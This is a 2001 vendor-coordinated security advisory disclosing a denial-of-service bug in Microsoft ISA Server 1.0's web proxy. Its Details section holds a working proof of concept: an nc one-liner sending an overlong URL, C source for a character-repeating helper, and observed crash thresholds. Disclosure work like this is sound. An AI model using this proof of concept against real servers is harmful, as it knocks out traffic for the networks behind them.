[SX-20010320-2] - Microsoft ISA Server Denial of Service

FSC Internet Corp. / SecureXpert Labs Advisory [SX-20010320-2]

Denial of Service in Microsoft ISA server v1.0

Summary

Microsoft ISA Server 1.0 on Windows 2000 Server SP1 is vulnerable to a
simple network-based attack which stops all incoming and outgoing web
traffic from passing through the firewall until the firewall is rebooted
or the affected service is restarted.

If the firewall is configured to use the "Web Publishing" feature (inbound
HTTP proxy to a web server), this attack can be performed remotely.

Details

Microsoft ISA server includes a web proxy component (W3PROXY.EXE) that is used
for both the "publishing" of internal web servers to the external network and
for proxying of internal requests to external web servers.

Sending a URL with a long pathname component to this proxy will cause it to
terminate with an access violation error.

For example, sending the (valid) HTTP request:

GET http://hostname/aaa[3000 more occurences of 'a'] HTTP/1.0\n\n

to port 80 on the ISA Server's external interface will cause W3PROXY.EXE to
terminate with an access violation.

This can easily be reproduced from a Linux system by using the following simple
shell command:

printf 'GET http://${HOST}/%s HTTP/1.0\n\n' `./repeat ${x} ${y}` | \
nc ${HOST} 80

where:

• printf is the shell utility of that name
• ${HOST} is an environment variable set to a hostname which resolves to the
  external IP of the ISA server
• ./repeat is the simple C program whose source is given below
• ${x} is the ASCII value of the character to insert into the generated URL
• ${y} is the number of repetions of ${x}

The `repeat' program can be compiled from the following simple C source:

/*

• repeat.c – quick-n-dirty hack to output argv[2] instances of the
• character whose ASCII value is given as argv[1]
• WARNING - this has absolutely no error checking!
  */

#include <stdio.h>

main (int argc, char **argv) {
int character;
long repetitions, i;

if ( argc != 3 ) {
printf("usage: repeat char reps\n");
exit(1);
}
character = atoi(argv[1]);
repetitions = atol(argv[2]);

for (i = 0L; i < repetitions; i++) {
printf ("%c", character);
}
}

The behaviour of W3PROXY.EXE is dependent both on the value of ${x} and the
value of ${y}. With ${x} of 55, the following behavious is observed based on
the value of ${y}:

100: processes correctly, returns "404 Object Not Found" from target web server.
200: returns 404
250: returns 404
254: returns 404
255: returns "414 URL Too Long"
260: returns 414
300: returns 414
2000: returns 414
2100: returns 414
2200: returns 414
2300: returns 414
2300, repeated several times: W3PROXY.EXE grows to 128MB of process size and
is then terminated with an access violation.
2350: W3PROXY.EXE is terminated on the first attempt.
All larger values: as 2350, above.

With different values of ${x}, different behaviour is observed for some values
of ${y}. This, along with preliminary analyis of the Dr. Watson logs generated
upon termination of W3PROXY.EXE, initially suggested that an exploitable overflow
may have been present. However, source code analysis by Microsoft has indicated
that only a heap overflow is present, and therefore that this vulnerability is
not exploitable beyond denial of service.

Status

Microsoft Corp. was informed of this vulnerability on April 2, 2001.
A hotfix to address this issue will be released on April 16, 2001,
synchronized with the release of this advisory.

Credits

Richard Reiner, SecureXpert Labs
Graham Wiseman, SecureXpert Labs
Matthew Siemens, SecureXpert Labs
Kent Nicolson, SecureXpert Labs

About SecureXpert DIRECT

SecureXpert DIRECT is an advance security advisory service provided to qualified
subscribers by SecureXpert Labs. Subscriptions are free of charge and may be
obtained at http://www.securexpert.com/services.html.